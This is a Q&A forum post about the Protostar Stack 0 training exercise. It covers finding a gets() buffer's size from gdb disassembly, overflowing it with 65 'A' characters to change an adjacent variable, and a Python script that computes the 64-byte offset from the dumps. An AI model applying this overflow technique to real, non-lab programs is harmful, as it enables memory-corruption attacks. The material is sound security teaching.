Protostar Stack 0 challenge: how to find out the buffer size from the assembly code?

Time: 2018-10-22 14:30:08

Tags: c assembly

I have been trying the protostar stack0 challenge and want to know how to find out the buffer size without the source code.

The original site (http://exploit-exercises.com/protostar) is no longer available, but you can still download a copy of the ISO from https://download.vulnhub.com/exploitexercises/exploit-exercises-protostar-2.iso

Here is the assembly code

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave  
0x08048434 <main+64>:   ret    
End of assembler dump.
(gdb)

Based on the code, I can see the gets function (which reads a line from stdin).

0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]

So I set breakpoints before and after that line to see what it does.

(gdb) info breakpoints 
No breakpoints or watchpoints.
(gdb) break *0x0804840c
Breakpoint 3 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 4 at 0x8048411: file stack0/stack0.c, line 13.
(gdb) 

Time to test the gets function with random data.

user@protostar:~$ python -c 'print "A"*60'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
user@protostar:~$ 

In the first case, I will supply 60 'A' characters. I use the python code above to generate the 60 A characters.

(gdb) r
Starting program: /opt/protostar/bin/stack0 

Breakpoint 3, 0x0804840c in main (argc=1, argv=0xbffff864) at stack0/stack0.c:11
11      in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 4, main (argc=1, argv=0xbffff864) at stack0/stack0.c:13
13      in stack0/stack0.c
(gdb) i r $eip $esp $ebp
eip            0x8048411        0x8048411 <main+29>
esp            0xbffff750       0xbffff750
ebp            0xbffff7b8       0xbffff7b8
(gdb) x/40 $esp
0xbffff750:     0xbffff76c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x08048400      0x00000000
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864      0xbffff86c      0xb7fe1848
0xbffff7d0:     0xbffff820      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff7e0:     0x00000001      0xbffff820      0xb7ff0626      0xb7fffab0
(gdb) c
Continuing.
Try again?

Program exited with code 013.
(gdb) 

I know from seeing the source code that if I input more than 64 A's, I will get the answer.

(gdb) r
Starting program: /opt/protostar/bin/stack0 

Breakpoint 3, 0x0804840c in main (argc=1, argv=0xbffff864) at stack0/stack0.c:11
11      in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 4, main (argc=1, argv=0xbffff864) at stack0/stack0.c:13
13      in stack0/stack0.c
(gdb) i r $eip $esp $ebp
eip            0x8048411        0x8048411 <main+29>
esp            0xbffff750       0xbffff750
ebp            0xbffff7b8       0xbffff7b8
(gdb) x/40 $esp
0xbffff750:     0xbffff76c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x00000041
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864      0xbffff86c      0xb7fe1848
0xbffff7d0:     0xbffff820      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff7e0:     0x00000001      0xbffff820      0xb7ff0626      0xb7fffab0
(gdb) c
Continuing.
you have changed the 'modified' variable

Program exited with code 051.
(gdb) 

The question is, what if I don't have the source code?

How do I find out the exact buffer size?

1 answer:

Answer 0 (score: 0)

I'm new to RE, but I'll try my best to answer

0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]

At main+9 it stores 0x0 at [esp+0x5c], and any input will be stored in the buffer from [esp+0x1c] up to [esp+0x5c]. So 0x5c-0x1c = 64 (decimal)
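The following Python script is an added example, not code from the question or the answer. It automates the two things done by hand in this thread: it reads the esp-relative offsets out of the gdb disassembly (the `lea eax,[esp+N]` argument passed to gets and the `mov eax,DWORD PTR [esp+N]` load that is tested right after the call) and subtracts them to get the distance from the buffer to the checked local, and it cross-checks that number against the two `x/40 $esp` dumps from the question by counting how many 0x41 bytes actually landed in memory and reading the dword at esp+0x5c. The disassembly and dump excerpts embedded below are copied from the question's gdb session; the regexes assume gdb's Intel-syntax output as shown there and only the esp-relative addressing this binary uses (gcc aligned the frame with `and esp,0xfffffff0`, so locals are addressed from esp rather than ebp).

```python
import re

# Excerpt of the gdb disassembly from the question (Intel syntax), embedded
# so the example runs offline.
DISASM = """
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
"""

# esp at breakpoint 4 in both of the question's runs.
ESP = 0xBFFFF750

# 'x/40 $esp' excerpts from the question: after 60 A's and after 65 A's.
DUMP_60 = """
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x08048400      0x00000000
"""
DUMP_65 = """
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x00000041
"""

HEX = r"(0x[0-9a-f]+)"
LEA_RE = re.compile(r"lea\s+eax,\[esp\+" + HEX + r"\]")
CALL_RE = re.compile(r"call\s+0x[0-9a-f]+\s+<(\w+)@plt>")
LOAD_RE = re.compile(r"mov\s+eax,DWORD PTR \[esp\+" + HEX + r"\]")
DUMP_RE = re.compile(r"^(0x[0-9a-f]+):\s+(.*)$")


def gets_buffer_offset(disasm):
    """esp-relative offset handed to gets(): the last 'lea eax,[esp+N]'
    before 'call <gets@plt>'."""
    last_lea = None
    for line in disasm.splitlines():
        m = LEA_RE.search(line)
        if m:
            last_lea = int(m.group(1), 16)
        c = CALL_RE.search(line)
        if c and c.group(1) == "gets":
            if last_lea is None:
                raise ValueError("no lea into esp-relative slot before gets")
            return last_lea
    raise ValueError("no call to gets found")


def checked_local_offset(disasm):
    """esp-relative offset of the first local loaded into eax after gets()
    returns (the value the code then tests with 'test eax,eax')."""
    after_gets = False
    for line in disasm.splitlines():
        c = CALL_RE.search(line)
        if c and c.group(1) == "gets":
            after_gets = True
            continue
        m = LOAD_RE.search(line) if after_gets else None
        if m:
            return int(m.group(1), 16)
    raise ValueError("no esp-relative load after gets")


def overflow_distance(disasm):
    """Bytes from the start of the gets() buffer to the checked local."""
    return checked_local_offset(disasm) - gets_buffer_offset(disasm)


def parse_dump(text):
    """Turn 'x/40 $esp' output into {dword address: value}."""
    mem = {}
    for line in text.splitlines():
        m = DUMP_RE.match(line.strip())
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, word in enumerate(m.group(2).split()):
            mem[base + 4 * i] = int(word, 16)
    return mem


def local_value(mem, esp, offset):
    """Dword stored at esp+offset in the parsed dump."""
    return mem[esp + offset]


def count_fill_bytes(mem, addr, fill=0x41):
    """Consecutive bytes equal to `fill` starting at addr, reading the dump's
    little-endian dwords; stops at the first other byte or end of dump."""
    n = 0
    while True:
        a = addr + n
        word = mem.get(a & ~3)
        if word is None or ((word >> (8 * (a & 3))) & 0xFF) != fill:
            return n
        n += 1


if __name__ == "__main__":
    buf = gets_buffer_offset(DISASM)
    chk = checked_local_offset(DISASM)
    print("buffer at esp+%#x, checked local at esp+%#x, distance %d bytes"
          % (buf, chk, overflow_distance(DISASM)))
    for label, text in (("60 A's", DUMP_60), ("65 A's", DUMP_65)):
        mem = parse_dump(text)
        print("%s: %d A bytes in memory, local = %#x"
              % (label, count_fill_bytes(mem, ESP + buf), local_value(mem, ESP, chk)))
```

Run as-is it reports a 64-byte distance, 60 A bytes followed by the gets() terminator in the first dump with the local still 0, and 65 A bytes in the second dump with the local now 0x41: the 65th byte is exactly the one that reached esp+0x5c. The same reading applies when auditing any binary that calls gets(): the distance between the buffer slot and the next live local is the write budget the program silently grants to stdin, which is why a fix replaces gets() with a length-bounded read such as fgets().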